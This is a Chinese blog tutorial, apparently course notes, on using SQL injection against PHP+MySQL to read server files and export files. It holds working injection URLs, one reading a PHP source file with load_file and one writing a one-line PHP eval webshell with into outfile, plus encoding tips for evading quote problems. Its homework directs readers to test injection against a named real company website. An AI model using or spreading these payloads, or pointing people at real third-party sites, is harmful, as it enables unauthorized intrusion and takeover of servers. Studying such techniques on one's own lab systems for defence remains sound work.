第三课php+mysql注入下的文件读取及文件导出

最新推荐文章于 2024-07-25 00:29:45 发布
最新推荐文章于 2024-07-25 00:29:45 发布
阅读量304 收藏 1
点赞数
分类专栏: WEB安全&渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dianyanxia/article/details/86567693
版权

php+mysql注入下

(文件读取及文件导出)

 

注意:mysql数据库默认最高权限用户为root

 

查询参数:

  1. 数据库名 database() fanke
  2. 数据库版本 version() 5.1.28-rc-community
  3. 数据库用户 user()  root@localhost
  4. 操作系统 version_compile_os Win32

 

4.1.Windows,linux主机大小写敏感问题

Windows大小写不敏感

Linux大小写敏感

4.2文件目录结构问题

4.3搭建平台问题

 

 

Mysql

Fanke

User

Username,password

内容

数据库b

表名

列名

内容

 

数据库c

表名

列名

内容

 

mysql命令行连接mysql数据库

使用方法:mysql.exe -u用户名 -p密码 -h地址

测试不同用户登录的文件操作权限

文件读取:load_file 文件导出:into outfile

select load_file('d:/debug.txt');

select 'aaaa' into outfile 'd:/d.txt';

Root用户登录的权限情况:

可以文件读取,可以文件导出

 

Test用户登录的权限情况:

无法文件读取及文件导出

 

问题:网站绝对路径怎么获取?

  1. 报错显示

 

  1. 谷歌黑客

  1. 遗留文件

  1. 读配置文件

搭建平台配置文件会存储网站的信息,其中包括网站的绝对路径信息

  1. 漏洞报错

 

注意:文件路径符号问题(“/”或“\\”)

编程中“\”代表的是转义字符

 

 

文件读取:

http://127.0.0.1:88/test/test.php?x=4 UNION SELECT load_file('D:\\APMServ5.2.6\\www\\htdocs\\test\\test.php'),2,3,4,5

文件写入:

127.0.0.1:88/test/test.php?x=4 UNION SELECT '<?php @eval($_POST[pass]);?>',2,3,4,5 into outfile 'D:\\APMServ5.2.6\\www\\htdocs\\test\\2.php'

 

 

注意:文件写入一句话时,务必注意单引号问题,一句话不要带单引号或者采用编码写入。

(采用编码及不用单引号,用单引号就不能采用编码,hex编码)

 

作业:

  1. 本地php文件读取写入测试
  2. 实际网站测试注入http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=56

 

 

 

 

 

 

 

 

说好今夜不点烟
关注
专栏目录
67.网络安全渗透测试—[SQL注入篇6]—[MySQL+PHP-读写操作]
qwsn
08-31 1946
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 读写操作 1、MySQL特性:`secure_file_priv特性` 2、MySQL+PHP 读操作 3、windows和linux的常用目录文件 4、MySQL+PHP 写操作
使用sqlmap对进行php+mysql注入实战
xiaoi123的博客
05-31 2912
作者:陈小兵一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程中,也可能因为服务器配置等情况导致无法获取权限。1.1php注入点的发现及扫描1.使用漏洞扫描工具进行漏洞扫描    将目标url地址放在wvs中进行漏洞扫描,如图1所示,扫描结果显示存在SQL盲注和SQL注入,其漏洞存在的参数为同一页面。图1使...
php注入文件读取器
01-16
软件只用于学习交流,杜绝破坏社会稳定,伤害他人利益 本软件通过Mysql注入读取服务器上的程序,分为快速和慢速读取两种方式,用户可以自行选择。慢速读取可以修改并发线程数量来提高读取速度。
小迪教程第五天——Php+mysql注入文件读取文件导出
仲夏
10-16 1508
1、Mysql数据库最高权限用户:root注入点不同的权限用户是取决于连接数据库时的用户2、小实验:测试mysql不同用户文件操作权限测试root的文件操作权限 Root用户权限可以执行sql语句对文件进行读写操作 有读取权限: 有写入权限: 测试test普通用户的文件操作权限 Test普通用户权限不可以执行sql语句对文件进行读写操作3、符号问题,编码问题, 路径问题符号问题: 使
SQL注入-文件读写
最新发布
m0_73902453的博客
07-25 1183
就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。
Mysql注入读写文件
m_de_g的博客
11-30 3493
1.Mysql注入文件 MySQL数据库在渗透测试过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)。 读取前提: 1.用户权限足够高,尽量具有root权限。 2.secure_file_priv不为NULL。 修改mysql.ini的配置 可以看到里面secure_file_priv =的配置语句,如果没有的看到配置文件的话,需要添加上 2.Mysql注入文件 3.写入Webshell 4.Sqlmap安全测试 ...
[mysql][sql注入]读写文件
qq_37301470的博客
11-14 275
secure_file_priv 全局变量 mysql> show variables like "%secure_file%" -> ; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | NULL | +------------------+-------+ 1 row in set, 1 warning (0.00
PHP实例开发源码—MYSQL管理工具php+mysql.zip
11-22
通过这个工具,用户可以无需依赖像phpMyAdmin这样的第三方应用,就能在Web环境下对数据库进行各种操作。源码的分析和学习有助于提升PHP开发者对于数据库交互的理解和技能。 【标签】"php"表明此项目是基于PHP语言...
php基础知识,php 添 删 查 改 导出mysql数据库 s2.zip
07-31
数据库设计遵循范式理论,如第一范式(1NF)、第二范式(2NF)、第三范式(3NF),以减少数据冗余和提高数据一致性。 **PHPMySQL的结合** 在PHP中,我们可以使用mysqli或PDO扩展与MySQL通信。例如,使用mysqli_query...
SQL Injection3(读取和上传文件文件)
kid的博客
04-09 884
SQL Injection3(读取和上传文件文件) 前言 前一篇文章在盲注查询资料的时候意外发现了一篇讲利用MySQL来进行读取和上传文件的博客,这里来实际操作一下 读取文件 读取文件主要使用的是load_file文件 查询了下load_file函数的使用条件主要有如下两个 文件权限:chmod a+x pathtofile 文件大小: 必须小于max_allowed_packet ok,...
PHP注入文件
10-13
来自阿里云的PHP安全防护 1.将waf.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码 在php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
mysql 报错注入文件_mysql注入总结
weixin_29802461的博客
01-26 553
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性0x07 声明正文:0x00 mysql一般注入(select)1.注释符#/*—2.过滤空格注入使用/**/或()或+代替空格%0c = f...
sql 注入读写文件
yuan_boss的博客
08-24 809
获取到用户为root,主机为localhost,然后将这两个信息作为条件,接下来查看是否有文件读写权限。与当前mysql用户具有File_priv权限之外,还要确保当前系统用户具有访问hosts文件的权限。根据结果可知,当前mysql用户为root,主机为名为localhost。要想复现sql注入的读写,首先mysql就需要满足下面的条件。想要读取某个文件,除了需要需要关闭mysql中的安全选项。本次实战,以sqli_labs靶场的第1关为例。发现读取成功,看到了hosts文件的内容。通过联合注入的方式,
MySQL注入读写文件、HTTP头中的SQL注入和cookie注入
weixin_45735361的博客
02-21 464
MySQL注入读写文件 MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(前提是权限足够) 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 读取文件内容 http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('文件路径'...
MYSQL注入|文件读写|获取敏感信息|上传getshell|绕过宽字节、magic_quotes_gpc
没有
04-09 4210
文章目录1.SQL注入的思维导图2.MYSQL注入思维导图3.文件读写获取路径常见方法(1).报错显示(2).遗留文件(3).漏洞报错(4).平台配置文件(5). 爆破文件读写函数(1)load_file():读取函数(2)into outfile或iinto dumpfile:导出函数写入WebShell的几种方式 1.SQL注入的思维导图 2.MYSQL注入思维导图 3.文件读写 文件读写操作: load_file():读取函数 into outfile或iinto dumpfile:导出函数 会用
mysql 注入文件_关于SQL注入文件读写的方法总结
weixin_35866747的博客
01-19 215
前言SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。一、MySQL文件常见的读文件,可以用16进制代替字符串select load_file('c:/boot.ini')select load_file(0x633a2f626f6f742e696e69)select load_file('//ecma.io/1.txt')...
Web安全第7讲 - MySQL注入读写文件、HTTP头中的SQL注入、绕过SQL注入
Yauger的博客
02-20 454
一、MySQL注入读写文件 1.1 查看是否有权限在mysql读写文件 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 1.1.1 打开命令行查看 show global variables like 'secure_file_priv'; 1.1.2 打开mysql-ini 1.1.3 在最后添加,保存,并重启mysql服务 se...
PHP+MYSQL手工注入实战:获取ROOT权限与数据库连接文件
攻击者进一步利用`LOAD_FILE()`函数,这是MySQL的一种特殊功能,允许在服务器上读取文件内容。他们构造了一个包含文件路径的SQL查询,试图获取`dbcon.class.php`文件的内容,从而推测出该网站的数据库连接配置。文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值